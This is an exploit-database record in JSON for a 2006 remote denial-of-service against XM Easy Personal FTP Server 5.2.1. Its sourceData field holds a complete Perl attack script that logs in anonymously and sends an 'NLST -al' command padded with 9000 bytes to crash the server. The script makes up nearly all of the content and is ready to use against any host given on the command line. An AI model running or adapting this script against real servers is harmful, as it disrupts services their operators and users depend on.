Description
XM Easy Personal FTP Server 5.2.1 - Remote Denial of Service
{"id": "EXPLOITPACK:F15FE817144C6E824E83A473123B8E1B", "vendorId": null, "type": "exploitpack", "bulletinFamily": "exploit", "title": "XM Easy Personal FTP Server 5.2.1 - Remote Denial of Service", "description": "\nXM Easy Personal FTP Server 5.2.1 - Remote Denial of Service", "published": "2006-11-04T00:00:00", "modified": "2006-11-04T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "boecke", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2020-04-01T19:05:27", "viewCount": 5, "enchantments": {"dependencies": {}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "_state": {"dependencies": 1678960072, "score": 1684000228, "epss": 1678962009}, "_internal": {"score_hash": "b26c5cc87736f74ef0a3309504fe2c4e"}, "sourceData": "#!/usr/bin/perl\n#\n# *\n# * Title: XM Easy Personal FTP Server <= 5.2.1 'NLST -al' Remote Denial of Service\n# * Author: boecke\n# * Discovery: boecke\n# * Vulnerability Type: Remote Denial of Service\n# * Risk: Low Risk (Requires valid\n# * Software Affected: XM Easy Personal FTP Server <= 5.2.1\n# * Greetings: henrik, str0ke!\n# *\n#\n\nuse IO::Socket;\n\n$commandToSend = \"NLST -al \";\n$remoteUsername = \"anonymous\";\n$remotePassword = \"borat\\@kik.com\";\n$remotePort = $ARGV[1];\n\nsub bannerExploit()\n{\n print \"\\n x XM Easy Personal FTP Server <= v5.2.1 Remote Denial of Service\\n\";\n print \" x Author: boecke\\n x Discovery: boecke (boecke [at] herzeleid [dot] net)\\n\\n\";\n}\n\nif ( @ARGV < 2 )\n{\n bannerExploit();\n\n print \" * Usage: perl ftp.pl 192.168.0.1 21\\n\\n\";\n\n exit;\n}\n\nif ($socket = IO::Socket::INET->new( PeerAddr => $ARGV[0], PeerPort => $remotePort, Proto => \"TCP\" ))\n{\n bannerExploit();\n\n print \" + Establishing connection at \" . $ARGV[0] . \":\" . $remotePort . \"\\n\";\n\n print $socket \"USER \" . $remoteUsername . \"\\r\\n\";\n\n print \" * FTP Username: \\'\" . $remoteUsername . \"\\'\\n\";\n\n sleep( 1 );\n\n print $socket \"PASS \" . $remotePassword . \"\\r\\n\";\n\n print \" * FTP Password: \\'\" . $remotePassword . \"\\'\\n\";\n\n print $socket $commandToSend . \"A\" x 9000 . \"\\r\\n\";\n\n sleep( 3 );\n\n print $socket \"QUIT\\r\\n\";\n\n print \" + Sent 9000 bytes of data to $ARGV[0]:$remotePort\\n\\n\";\n}\nelse\n{\n bannerExploit();\n\n print \" + Failed to establish connection to \" . $ARGV[0] . \":\" . $remotePort . \"\\n\";\n\n}\n\n# milw0rm.com [2006-11-04]", "affectedSoftware": [], "appercut": {}, "exploitpack": {"type": "dos", "platform": "windows"}, "hackapp": {}, "toolHref": "", "w3af": {}}
{}